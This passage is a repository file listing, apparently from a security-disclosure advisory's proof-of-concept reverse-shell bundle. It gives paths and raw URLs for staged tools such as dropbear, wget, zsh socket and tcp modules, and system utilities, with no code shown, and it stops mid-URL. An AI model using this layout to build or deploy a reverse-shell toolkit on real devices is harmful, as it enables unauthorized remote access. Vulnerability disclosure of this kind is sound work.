https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/screen -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/script: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/script -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sed -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/seq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/seq -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/split: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/split -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sqlite3 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/stat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/stat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/syslog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/syslog -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tail: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tail -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tar -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tee: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tee -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/time: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/time -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/true: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/true -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/tset: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/tset -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/uname: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/uname -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/vim: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/vim -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/vm_stat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/vm_stat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/wc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/wc -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/what: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/what -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/which: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/which -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/xargs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/xargs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/xxd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/xxd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dbclient: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dbclient -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbear -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearconvert: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearconvert -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearkey: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/dropbearkey -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/filemon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/filemon -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/jtool: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/jtool -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/procexp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/procexp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/bin/wget: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/bin/wget -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/attr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/attr.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/cap.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/cap.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/clone.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/clone.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/compctl.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/compctl.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complete.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complete.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complist.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/complist.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/computil.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/computil.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/curses.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/curses.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/datetime.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/datetime.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/deltochar.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/deltochar.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/example.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/example.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/files.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/files.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/langinfo.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/langinfo.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mapfile.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mapfile.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/newuser.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/newuser.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/parameter.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/parameter.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/regex.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/regex.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/socket.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/socket.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/stat.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/stat.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/system.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/system.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/tcp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/tcp.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/termcap.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/termcap.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/terminfo.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/terminfo.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zftp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zftp.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zle.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zle.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zprof.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zprof.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zpty.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zpty.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zselect.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zselect.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zutil.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/local/lib/zsh/5.0.8/zsh/zutil.so -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/chown: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/chown -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/ioreg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/ioreg -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/kextstat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/kextstat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/ltop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/ltop -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/netstat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/netstat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/nvram: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/nvram -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/sysctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/sysctl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/taskpolicy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/taskpolicy -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+arrows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+arrows -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+csr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+csr -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+cup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+cup -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+enq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+enq -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+erase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+erase -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idc -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl1 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+inittabs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+inittabs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local1 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+pp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+pp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rca: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rca -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 